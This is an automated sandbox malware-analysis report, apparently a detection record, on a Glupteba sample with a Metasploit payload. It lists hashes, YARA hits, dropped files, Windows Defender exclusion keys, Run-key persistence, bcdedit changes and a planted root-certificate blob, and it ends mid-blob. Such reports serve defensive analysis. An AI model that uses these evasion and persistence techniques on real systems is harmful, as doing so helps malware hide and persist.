Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
04-03-2021 21:00
Static task
static1
Behavioral task
behavioral1
Sample
er.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
er.exe
Resource
win10v20201028
General
-
Target
er.exe
-
Size
4.0MB
-
MD5
160dd398272fd4fdf51f410adad9a51b
-
SHA1
f49489e7960978dd7dbb1784b0c67b1fd540926d
-
SHA256
2bd6567a2a3321019d204a42484e626c8b98ecbaf068b66833fc15a737c1f42e
-
SHA512
8e9d8eadc207bc4ee11d7971a7dc75f1cacd94579c03f406128c302e85c50c0f58e5723d3da74f0c0049b18cdde1842ef6658dbee5d897154377fb39fae4ead4
Malware Config
Extracted
metasploit
windows/single_exec
Signatures
-
Glupteba Payload 4 IoCs
Processes:
resource yara_rule behavioral1/memory/1648-6-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba behavioral1/memory/1648-7-0x0000000004E80000-0x00000000056DD000-memory.dmp family_glupteba behavioral1/memory/1648-8-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba behavioral1/memory/1584-24-0x0000000000400000-0x0000000000C77000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Modifies boot configuration data using bcdedit 14 IoCs
Processes:
bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exepid process 816 bcdedit.exe 1248 bcdedit.exe 796 bcdedit.exe 680 bcdedit.exe 328 bcdedit.exe 604 bcdedit.exe 1212 bcdedit.exe 1492 bcdedit.exe 1344 bcdedit.exe 828 bcdedit.exe 1056 bcdedit.exe 1500 bcdedit.exe 1140 bcdedit.exe 796 bcdedit.exe -
Blocklisted process makes network request 2 IoCs
Processes:
rundll32.exeflow pid process 7 1164 rundll32.exe 9 1164 rundll32.exe -
Drops file in Drivers directory 1 IoCs
Processes:
csrss.exedescription ioc process File created C:\Windows\system32\drivers\Winmon.sys csrss.exe -
Executes dropped EXE 15 IoCs
Processes:
csrss.exepatch.exedsefix.exewindefender.exewindefender.exeww31.exeupdateprofile-15.exeu20200626.exeupdateprofile-15.exeu20200626.exegetfp.exegetfp.exemg20201223-1.exeml20201223.exem672.exepid process 1584 csrss.exe 1520 patch.exe 528 dsefix.exe 628 windefender.exe 1808 windefender.exe 904 ww31.exe 2020 updateprofile-15.exe 1900 u20200626.exe 1488 updateprofile-15.exe 796 u20200626.exe 1588 getfp.exe 2088 getfp.exe 2120 mg20201223-1.exe 2220 ml20201223.exe 2328 m672.exe -
Modifies Windows Firewall 1 TTPs
-
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
Processes:
resource yara_rule C:\Windows\windefender.exe upx behavioral1/memory/628-62-0x0000000000400000-0x0000000000897000-memory.dmp upx C:\Windows\windefender.exe upx C:\Windows\windefender.exe upx \Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe upx C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe upx \Users\Admin\AppData\Local\Temp\csrss\u20200626.exe upx C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe upx \Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe upx C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe upx \Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe upx \Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe upx \Users\Admin\AppData\Local\Temp\csrss\u20200626.exe upx behavioral1/memory/2020-85-0x0000000000400000-0x0000000000C1C000-memory.dmp upx behavioral1/memory/1900-86-0x0000000000400000-0x0000000000C1B000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe upx \Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe upx \Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe upx \Users\Admin\AppData\Local\Temp\csrss\updateprofile-15.exe upx behavioral1/memory/1488-92-0x0000000000400000-0x0000000000C1C000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\csrss\u20200626.exe upx \Users\Admin\AppData\Local\Temp\csrss\getfp.exe upx behavioral1/memory/796-95-0x0000000000400000-0x0000000000C1B000-memory.dmp upx \Users\Admin\AppData\Local\Temp\csrss\getfp.exe upx C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe upx behavioral1/memory/1588-99-0x0000000000400000-0x00000000005E6000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\csrss\getfp.exe upx \Users\Admin\AppData\Local\Temp\csrss\m672.exe upx C:\Users\Admin\AppData\Local\Temp\csrss\m672.exe upx -
Loads dropped DLL 30 IoCs
Processes:
er.exepatch.execsrss.exeupdateprofile-15.exeupdateprofile-15.exepid process 692 er.exe 692 er.exe 880 1520 patch.exe 1520 patch.exe 1520 patch.exe 1520 patch.exe 1520 patch.exe 1520 patch.exe 1520 patch.exe 1520 patch.exe 1584 csrss.exe 1584 csrss.exe 1584 csrss.exe 1584 csrss.exe 1584 csrss.exe 1584 csrss.exe 2020 updateprofile-15.exe 2020 updateprofile-15.exe 2020 updateprofile-15.exe 1488 updateprofile-15.exe 1488 updateprofile-15.exe 1488 updateprofile-15.exe 1584 csrss.exe 1584 csrss.exe 1584 csrss.exe 1584 csrss.exe 1584 csrss.exe 1584 csrss.exe 1584 csrss.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
er.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" er.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" er.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" er.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" er.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" er.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" er.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\er.exe = "0" er.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" er.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\SummerWater = "0" er.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" er.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
er.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000\Software\Microsoft\Windows\CurrentVersion\Run\SummerWater = "\"C:\\Windows\\rss\\csrss.exe\"" er.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops file in System32 directory 1 IoCs
Processes:
rundll32.exedescription ioc process File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\GameExplorer\{5DB02BE4-C29A-4813-9595-67091087F048}\PlayTasks\0\Play.lnk rundll32.exe -
Drops file in Windows directory 4 IoCs
Processes:
csrss.exeer.exedescription ioc process File created C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\windefender.exe csrss.exe File opened for modification C:\Windows\rss er.exe File created C:\Windows\rss\csrss.exe er.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
GoLang User-Agent 6 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
Processes:
description flow ioc HTTP User-Agent header 37 Go-http-client/1.1 HTTP User-Agent header 38 Go-http-client/1.1 HTTP User-Agent header 31 Go-http-client/1.1 HTTP User-Agent header 32 Go-http-client/1.1 HTTP User-Agent header 33 Go-http-client/1.1 HTTP User-Agent header 35 Go-http-client/1.1 -
Modifies data under HKEY_USERS 64 IoCs
Processes:
windefender.exeer.execsrss.exenetsh.exerundll32.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" er.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-111 = "Eastern Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-1412 = "Syria Standard Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs csrss.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-202 = "US Mountain Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-1 = "IPsec Relying Party" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-531 = "Sri Lanka Daylight Time" er.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-351 = "FLE Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-752 = "Tonga Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-571 = "China Daylight Time" er.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" er.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" er.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" er.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-932 = "Coordinated Universal Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-432 = "Iran Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-142 = "Canada Central Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-32 = "Mid-Atlantic Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" er.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-692 = "Tasmania Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" er.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-492 = "India Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-472 = "Ekaterinburg Standard Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" er.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-471 = "Ekaterinburg Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-100 = "EAP Quarantine Enforcement Client" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" er.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" er.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time" er.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-161 = "Central Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-91 = "Pacific SA Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time" er.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" er.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-251 = "Dateline Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" er.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\Software\Microsoft rundll32.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time" er.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-841 = "Argentina Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-172 = "Central Standard Time (Mexico)" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time" er.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" er.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" netsh.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-121 = "SA Pacific Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-301 = "Romance Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-331 = "E. Europe Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-371 = "Jerusalem Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-871 = "Pakistan Daylight Time" windefender.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time" er.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" er.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-531 = "Sri Lanka Daylight Time" windefender.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs csrss.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\25\52C64B7E\@tzres.dll,-411 = "E. Africa Daylight Time" windefender.exe -
Modifies registry class 3 IoCs
Processes:
rundll32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Local Settings\Software\Microsoft\Windows\GameUX\ServiceLocation rundll32.exe Key created \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Local Settings\Software\Microsoft\Windows\GameUX rundll32.exe Set value (int) \REGISTRY\USER\S-1-5-21-293278959-2699126792-324916226-1000_CLASSES\Local Settings\Software\Microsoft\Windows\GameUX\OOBGameInstalled = "1" rundll32.exe -
Processes:
csrss.exepatch.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 csrss.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 csrss.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b0500038